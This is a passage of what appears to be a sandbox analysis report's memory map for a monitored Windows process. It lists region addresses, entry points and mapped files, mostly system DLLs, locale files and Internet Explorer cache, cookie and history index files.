entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1015 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1016 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1017 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1018 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1019 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 1020 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1021 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 1022 start_va = 0x540000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1023 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1024 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1025 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1026 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1027 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1028 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1029 start_va = 0x2d0000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 1030 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1031 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1032 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1033 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1034 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1035 start_va = 0x749f0000 end_va = 0x74a01fff monitored = 0 entry_point = 0x749f1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1036 start_va = 0x755b0000 end_va = 0x756a4fff monitored = 0 entry_point = 0x755b1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1037 start_va = 0x751c0000 end_va = 0x75216fff monitored = 0 entry_point = 0x751d9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1038 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1039 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1040 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1041 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1042 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1043 start_va = 0x74de0000 end_va = 0x74f15fff monitored = 0 entry_point = 0x74de1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1044 start_va = 0x75740000 end_va = 0x7589bfff monitored = 0 entry_point = 0x7578ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1045 start_va = 0x75130000 end_va = 0x751befff monitored = 0 entry_point = 0x75133fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1046 start_va = 0x74ab0000 end_va = 0x74bd0fff monitored = 0 entry_point = 0x74ab158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1047 start_va = 0x76ed0000 end_va = 0x76edbfff monitored = 0 entry_point = 0x76ed238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1048 start_va = 0x74f30000 end_va = 0x7512afff monitored = 0 entry_point = 0x74f322d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1049 start_va = 0x749b0000 end_va = 0x749e1fff monitored = 0 entry_point = 0x749b37f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 1050 start_va = 0x75be0000 end_va = 0x76829fff monitored = 0 entry_point = 0x75c61601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1051 start_va = 0x74830000 end_va = 0x7484bfff monitored = 0 entry_point = 0x7483a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1052 start_va = 0x76960000 end_va = 0x76965fff monitored = 0 entry_point = 0x76961782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1053 start_va = 0x74820000 end_va = 0x74826fff monitored = 0 entry_point = 0x7482128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1054 start_va = 0x75960000 end_va = 0x75994fff monitored = 0 entry_point = 0x7596145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1055 start_va = 0x74850000 end_va = 0x74893fff monitored = 0 entry_point = 0x748663f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1056 start_va = 0x210000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1057 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1058 start_va = 0x770000 end_va = 0x8f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 1059 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1060 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1061 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1062 start_va = 0x900000 end_va = 0xa80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 1063 start_va = 0xa90000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 1064 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1065 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1066 start_va = 0x350000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 1067 start_va = 0x210000 end_va = 0x211fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1068 start_va = 0x250000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1069 start_va = 0x73a90000 end_va = 0x73c2dfff monitored = 0 entry_point = 0x73abe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1070 start_va = 0x220000 end_va = 0x220fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1071 start_va = 0x230000 end_va = 0x231fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1072 start_va = 0x1e90000 end_va = 0x215efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1073 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1074 start_va = 0x748d0000 end_va = 0x748dafff monitored = 0 entry_point = 0x748d1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1075 start_va = 0x240000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1076 start_va = 0x260000 end_va = 0x267fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1077 start_va = 0x270000 end_va = 0x283fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1078 start_va = 0x74f20000 end_va = 0x74f22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 1079 start_va = 0x290000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1080 start_va = 0x540000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1081 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 1082 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1083 start_va = 0x73950000 end_va = 0x739a1fff monitored = 0 entry_point = 0x739514be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 1084 start_va = 0x73930000 end_va = 0x73944fff monitored = 0 entry_point = 0x739312de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 1085 start_va = 0x73920000 end_va = 0x7392cfff monitored = 0 entry_point = 0x73921326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 1086 start_va = 0x350000 end_va = 0x350fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 1087 start_va = 0x3c0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1088 start_va = 0x350000 end_va = 0x350fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 1089 start_va = 0x360000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1090 start_va = 0x2160000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 1091 start_va = 0x2260000 end_va = 0x229ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 1092 start_va = 0x22a0000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 1093 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1094 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1095 start_va = 0x23a0000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 1096 start_va = 0x23e0000 end_va = 0x24dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 1097 start_va = 0x73910000 end_va = 0x73915fff monitored = 0 entry_point = 0x7391125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 1098 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1099 start_va = 0x24e0000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 1100 start_va = 0x2520000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 1101 start_va = 0x74a10000 end_va = 0x74a26fff monitored = 0 entry_point = 0x74a11c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1102 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1103 start_va = 0x76830000 end_va = 0x7685efff monitored = 0 entry_point = 0x76832a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1104 start_va = 0x74930000 end_va = 0x7496efff monitored = 0 entry_point = 0x74932351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1105 start_va = 0x73900000 end_va = 0x7390ffff monitored = 0 entry_point = 0x739038c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 1106 start_va = 0x2620000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 1107 start_va = 0x2680000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 1108 start_va = 0x640000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 1109 start_va = 0x747b0000 end_va = 0x747b5fff monitored = 0 entry_point = 0x747b14b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1110 start_va = 0x3a0000 end_va = 0x3a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1111 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1112 start_va = 0x748a0000 end_va = 0x748c0fff monitored = 0 entry_point = 0x748a145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1113 start_va = 0x75b90000 end_va = 0x75bd4fff monitored = 0 entry_point = 0x75b911e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1114 start_va = 0x733a0000 end_va = 0x733a8fff monitored = 0 entry_point = 0x733a1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1115 start_va = 0x3b0000 end_va = 0x3b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 1116 start_va = 0x2620000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 1117 start_va = 0x2670000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 1118 start_va = 0x747e0000 end_va = 0x7481bfff monitored = 0 entry_point = 0x747e145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1119 start_va = 0x2800000 end_va = 0x2a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1120 start_va = 0x747d0000 end_va = 0x747d4fff monitored = 0 entry_point = 0x747d15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1121 start_va = 0x747c0000 end_va = 0x747c5fff monitored = 0 entry_point = 0x747c1673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 1122 start_va = 0x73a50000 end_va = 0x73a87fff monitored = 0 entry_point = 0x73a5990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1123 start_va = 0x2800000 end_va = 0x28effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1124 start_va = 0x29f0000 end_va = 0x2a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 1125 start_va = 0x2680000 end_va = 0x26bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 1126 start_va = 0x26f0000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 1127 start_va = 0x28f0000 end_va = 0x29effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 1128 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 1129 start_va = 0x738a0000 end_va = 0x738b6fff monitored = 0 entry_point = 0x738a3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1130 start_va = 0x640000 end_va = 0x640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 1131 start_va = 0x749a0000 end_va = 0x749a7fff monitored = 0 entry_point = 0x749a34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 1132 start_va = 0x74990000 end_va = 0x74997fff monitored = 0 entry_point = 0x749910e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1133 start_va = 0x71e60000 end_va = 0x71e97fff monitored = 0 entry_point = 0x71e61489 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1134 start_va = 0x74970000 end_va = 0x74986fff monitored = 0 entry_point = 0x749735fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1135 start_va = 0x71ea0000 end_va = 0x71edcfff monitored = 0 entry_point = 0x71ea10f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1136 start_va = 0x738a0000 end_va = 0x738b6fff monitored = 0 entry_point = 0x738a3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1137 start_va = 0x2800000 end_va = 0x283bfff monitored = 0 entry_point = 0x280128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1138 start_va = 0x28b0000 end_va = 0x28effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 1139 start_va = 0x2800000 end_va = 0x283bfff monitored = 0 entry_point = 0x280128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1140 start_va = 0x2800000 end_va = 0x283bfff monitored = 0 entry_point = 0x280128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1141 start_va = 0x2800000 end_va = 0x283bfff monitored = 0 entry_point = 0x280128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1142 start_va = 0x2800000 end_va = 0x283bfff monitored = 0 entry_point = 0x280128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1143 start_va = 0x73860000 end_va = 0x7389afff monitored = 0 entry_point = 0x7386128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1144 start_va = 0x2a30000 end_va = 0x2b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 1145 start_va = 0x71e20000 end_va = 0x71e35fff monitored = 0 entry_point = 0x71e22061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 1146 start_va = 0x640000 end_va = 0x649fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 1147 start_va = 0x75950000 end_va = 0x75954fff monitored = 0 entry_point = 0x75951438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1148 start_va = 0x2b30000 end_va = 0x2d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 1149 start_va = 0x739d0000 end_va = 0x73a4ffff monitored = 0 entry_point = 0x739e37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1150 start_va = 0x2d30000 end_va = 0x2e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 1151 start_va = 0x2e40000 end_va = 0x2f1efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e40000" filename = "" Region: id = 1152 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 1153 start_va = 0x754c0000 